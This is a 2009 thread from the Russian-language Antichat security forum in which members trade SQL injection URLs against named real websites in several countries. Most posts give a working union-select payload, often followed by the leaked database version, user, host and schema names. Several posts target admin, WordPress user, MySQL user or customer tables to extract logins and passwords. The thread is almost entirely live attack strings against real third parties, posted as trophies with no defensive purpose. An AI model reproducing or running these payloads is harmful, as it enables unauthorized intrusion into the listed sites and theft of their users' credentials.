HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.11.2009, 09:37
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
http://www.belarus.kz/index.php?mod=news&nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
http://tilashar.kz/forum/message.php3?pagelist=20&messageID=-1+union+select+1,2,3,4,5,6,7,8,9,10--+
http://staff.kz/page.php?content=vacancy_view&uin=-1+union+select+password+from+admins--+
http://dknews.kz/article.php?id=-1+union+select+1,2,3--+
http://okp.kz/comp_view_vacancy.php?vac_id=-1+union+select+1,2,3,4,5,6,7,8,9--+
http://www.zhebrivskiy.org/pages.php?id=-1+union+select+1,2,3,4--+
http://www.clearflourbread.com/news.php?news_id=1-1+union+select+1,2,3,4--+
http://autoshina.kh.ua/news.php?idnews=-1+union+select+1,2,3--+
http://www.rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,3,4,5,6,7--+
http://www.egmont.ru/journals/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--+&print=yes
Проявляю активность! =)
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #2  
Старый 09.11.2009, 10:36
-JC-
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312

Репутация: 50
По умолчанию

Код:
http://www.southveter.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10+--+
 
Ответить с цитированием

  #3  
Старый 09.11.2009, 13:20
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

тИЦ: 130
Код:
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6+from+cms_admin
Код:
root@zvm11:rusconsultru:5.0.77
Код:
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,login,password),5,6+from+cms_admin
Код:
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,user_pass),5,6+from+wp_users
Код:
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user,password),5,6+from+mysql.user

Последний раз редактировалось jokester; 09.11.2009 в 13:50.. Причина: хеши
 
Ответить с цитированием

  #4  
Старый 09.11.2009, 14:10
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
По умолчанию

зарубежный хостинг :
http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),version(),database(),us er(),@@version_compile_os),3/**/from/**/plans

version - 5.0.81-community-log
database - lithiumh_lithium
user - lithiumh_lithium@localhost
os - unknown-linux-gnu

http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),ftp,domains,link),3/**/from/**/plans
 
Ответить с цитированием

  #5  
Старый 09.11.2009, 14:27
SENIA
Постоянный
Регистрация: 22.11.2008
Сообщений: 344
Провел на форуме:
3863128

Репутация: 570
По умолчанию

пр 5
Код:
http://www.ukrainianjournal.com/index.php?w=article&id=-9174+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7+from+uajournal_db.users--
Database Version: 5.0.85-log
Database name: uajournal_db
User name: uajournal_user@10.0.0.3
 
Ответить с цитированием

  #6  
Старый 09.11.2009, 14:39
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
По умолчанию

Цитата:
http://www.urheilupuisto.com/index.php?id=-5+and+1=0+union+select+concat_ws(0x3a,version(),us er(),database()),2,3,4--
5.0.82sp1-enterprise-gpl:w3452267db@10.0.8.82:w3452267db

Цитата:
http://www.knowmag.ca/knowitalls/index.php?id=5+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3--
4.0.27:know@199.175.106.40:know_db

Цитата:
http://www.verbenahotel.ru/index.php?id=-999+union+select+1,concat_ws(0x3a,version(),user() ,database()),3--
5.0.77:hotel_user@localhost:hotel_data

Цитата:
http://www.pizzifarm.com/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--
4.1.20izziadmin@localhostizzibs

Последний раз редактировалось jokester; 09.11.2009 в 16:55.. Причина: zagorod.net БОЯН
 
Ответить с цитированием

  #7  
Старый 09.11.2009, 14:56
maestra_toys
Banned
Регистрация: 08.11.2009
Сообщений: 26
Провел на форуме:
116719

Репутация: 15
По умолчанию

Ребята, а зачем вы все выкладываете это?

Если надо, то вот от меня:

http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,us er(),database(),version()),5,6%20--

Последний раз редактировалось jokester; 09.11.2009 в 16:53.. Причина: хеши
 
Ответить с цитированием

  #8  
Старый 09.11.2009, 15:06
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.daily-rent.ro/details.php?lang=en&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11/*



Database Version: 5.0.24a
Database name: daily_rent
User name: mihai-mir@localhost
Os: slackware-linux-gnu
 
Ответить с цитированием

  #9  
Старый 09.11.2009, 19:06
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

_http://www.fcdenderdetime.be/news.php?id=-4+union+select+1,2,version(),4,5--

5.0.32-Debian_7etch11-log

Код:
http://www.netfestival.be/pages/news.php?id=-7+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
netfestinetfst:netfestinetfst@10.0.85.248:4.0.25-standard-log

Код:
http://www.abyssplongee.be/news.php?cid=26&id=-16+union+select+1,unhex(hex(group_concat(table_name+separator+0x0b))),3,4+from+information_schema.tables--
_http://www.hotel-ste-cecile.be/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8--

Последний раз редактировалось 547; 09.11.2009 в 19:39..
 
Ответить с цитированием

  #10  
Старый 09.11.2009, 19:35
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
По умолчанию

http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,column_name,6,7+from+inform ation_schema.columns+where+table_name=0x6f696c5f75 73657273
MySQL 5.0.26-log
oil_users::
id:name:,pass:type:session

http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass ,type,session),6,7+from+oil_users
выводит все строки сразу

Последний раз редактировалось Bb0y; 09.11.2009 в 19:38..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.